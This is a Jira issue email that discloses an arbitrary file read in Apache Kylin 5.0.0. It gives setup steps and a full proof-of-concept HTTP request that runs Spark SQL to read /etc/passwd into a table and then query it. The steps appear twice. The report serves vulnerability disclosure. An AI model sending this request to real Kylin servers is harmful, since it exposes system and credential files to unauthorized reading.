[jira] [Created] (KYLIN-5986) [Security] Apache kylin read any file

Longfei Jiang (Jira) Wed, 12 Feb 2025 19:41:07 -0800

Longfei Jiang created KYLIN-5986:
------------------------------------

             Summary: [Security] Apache kylin read any file
                 Key: KYLIN-5986
                 URL: https://issues.apache.org/jira/browse/KYLIN-5986
             Project: Kylin
          Issue Type: Bug
    Affects Versions: 5.0.0
            Reporter: Longfei Jiang
             Fix For: 5.0.1
         Attachments: Fwd_ [Security]Apache kylin read any file.eml, 
image-2025-02-13-11-11-05-091.png, image-2025-02-13-11-11-30-021.png, 
image-2025-02-13-11-11-40-004.png, image-2025-02-13-11-11-48-871.png, 
image-2025-02-13-11-11-57-464.png


## 1. start kylin-docker


```sh
docker run --platform=linux/amd64 -d     --name Kylin5-Machine     --hostname 
localhost     -e TZ=UTC     -m 10G     -p 7070:7070     -p 8088:8088     -p 
9870:9870     -p 8032:8032     -p 8042:8042     -p 2181:2181     
apachekylin/apache-kylin-standalone:5.0.0-GA
```

## 2. change kylin.properties

Add `kylin.env.channel=cloud` into the file `kylin.properties`. This is to make 
`org.apache.kylin.rest.controller.SparkSourceController` work
 !image-2025-02-13-11-11-05-091.png! image.png
## 3. restart server

```
./kylin.sh stop
./kylin.sh start
```


# Exploit


1.Log in to the backend using an administrator account

2.http access `/kylin/api/spark_source/execute` to execute spark sql

```http
POST /kylin/api/spark_source/execute HTTP/1.1
Host: 127.0.0.1:7070
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 
(KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Viewer/99.9.8782.87
Accept: application/vnd.apache.kylin-v4+json
Accept-Language: cn
Accept-Encoding: gzip, deflate, br
Auto: false
X-Requested-With: XMLHttpRequest
DNT: 1
Connection: keep-alive
Referer: http://127.0.0.1:7070/kylin/
Cookie: 
c24882d0760bcad26b31ef95baaaa0ed96ea8fd461b11a9695cff5e969b6d4da=MTI5MjBjZGUtNDk1Yi00YzNhLTk4OTYtMmNhOWYwZDU1MWY2;
 session=c354aed6-c0e1-4463-98de-c26bc4df312f.o-aV6G0ydMKHAQ43gc1Cc0tOndE
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
sec-ch-ua-platform: "Windows"
sec-ch-ua: "Google Chrome";v="125", "Chromium";v="125", "Not=A?Brand";v="24"
sec-ch-ua-mobile: ?0
Content-Type: application/json
Content-Length: 94

{"sql":"CREATE TABLE temp_tablea AS SELECT * from 
text.`file:///etc/passwd`","database":"SSB"}
```
 !image-2025-02-13-11-11-30-021.png! image.png
3.Add new source


 !image-2025-02-13-11-11-40-004.png! image.png

4.Click `Refresh now` ,this is to load tables;


 !image-2025-02-13-11-11-48-871.png! image.png


5.Execute the sql statement `select * from SSB.TEMP_TABLEA` to get the contents 
of the `/etc/passwd` file

 !image-2025-02-13-11-11-57-464.png! image.png


The detailed information can be found in the email attachment:
## 1. start kylin-docker


```sh
docker run --platform=linux/amd64 -d     --name Kylin5-Machine     --hostname 
localhost     -e TZ=UTC     -m 10G     -p 7070:7070     -p 8088:8088     -p 
9870:9870     -p 8032:8032     -p 8042:8042     -p 2181:2181     
apachekylin/apache-kylin-standalone:5.0.0-GA
```

## 2. change kylin.properties

Add `kylin.env.channel=cloud` into the file `kylin.properties`. This is to make 
`org.apache.kylin.rest.controller.SparkSourceController` work
 !image-2025-02-13-11-11-05-091.png! image.png
## 3. restart server

```
./kylin.sh stop
./kylin.sh start
```


# Exploit


1.Log in to the backend using an administrator account

2.http access `/kylin/api/spark_source/execute` to execute spark sql

```http
POST /kylin/api/spark_source/execute HTTP/1.1
Host: 127.0.0.1:7070
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 
(KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Viewer/99.9.8782.87
Accept: application/vnd.apache.kylin-v4+json
Accept-Language: cn
Accept-Encoding: gzip, deflate, br
Auto: false
X-Requested-With: XMLHttpRequest
DNT: 1
Connection: keep-alive
Referer: http://127.0.0.1:7070/kylin/
Cookie: 
c24882d0760bcad26b31ef95baaaa0ed96ea8fd461b11a9695cff5e969b6d4da=MTI5MjBjZGUtNDk1Yi00YzNhLTk4OTYtMmNhOWYwZDU1MWY2;
 session=c354aed6-c0e1-4463-98de-c26bc4df312f.o-aV6G0ydMKHAQ43gc1Cc0tOndE
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
sec-ch-ua-platform: "Windows"
sec-ch-ua: "Google Chrome";v="125", "Chromium";v="125", "Not=A?Brand";v="24"
sec-ch-ua-mobile: ?0
Content-Type: application/json
Content-Length: 94

{"sql":"CREATE TABLE temp_tablea AS SELECT * from 
text.`file:///etc/passwd`","database":"SSB"}
```
 !image-2025-02-13-11-11-30-021.png! image.png
3.Add new source


 !image-2025-02-13-11-11-40-004.png! image.png

4.Click `Refresh now` ,this is to load tables;


 !image-2025-02-13-11-11-48-871.png! image.png


5.Execute the sql statement `select * from SSB.TEMP_TABLEA` to get the contents 
of the `/etc/passwd` file

 !image-2025-02-13-11-11-57-464.png! image.png


The detailed information can be found in the email attachment:
Fwd_ [Security]Apache kylin read any file.eml




--
This message was sent by Atlassian Jira
(v8.20.10#820010)

[jira] [Created] (KYLIN-5986) [Security] Apache kylin read any file

Reply via email to